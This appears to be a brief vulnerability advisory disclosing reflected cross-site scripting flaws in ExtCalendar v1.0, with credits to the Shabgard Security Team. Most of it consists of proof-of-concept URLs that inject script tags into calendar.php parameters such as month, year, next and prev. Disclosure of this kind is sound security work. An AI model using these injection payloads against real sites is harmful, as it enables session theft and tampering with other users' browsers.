ExtCalendar v1.0 suffers from multiple XSS vulnerabilities.
5689ac6c56f8aa1fd445add19a08dda6f28dfb7110bc1bf0129590a98afd0069
------------------------------------------
ExtCalendar v1.0 Multiple Xss Vuln
------------------------------------------
Bug:
http://victim/path/calendar.php?op=cal&month=3&year="><script>alert(/Soot/)</script>
http://victim/path/calendar.php?op=cal&month="><script>alert(/Soot/)</script>&year=2006
http://victim/path/calendar.php?op=day&ask=nd&da=28&mo=3&ye=2006&next="><script>alert(/Soot/)</script>
http://victim/path/calendar.php?op=day&ask=nd&da=28&mo=3&ye=2006&next=2&prev="><script>alert(/Soot/)</script>
Vulnerable:
ExtCalendar 1
Not Vulnerable:
ExtCalendar 2
------------------------------------------
Source :
http://soot.shabgard.org/ExtCalendar.txt
Credit :
Soot
Shabgard Security Team
http://www.shabgard.org
Greetz :
Hergy,Elite,Bl2k,Littlehacker,...
------------------------------------------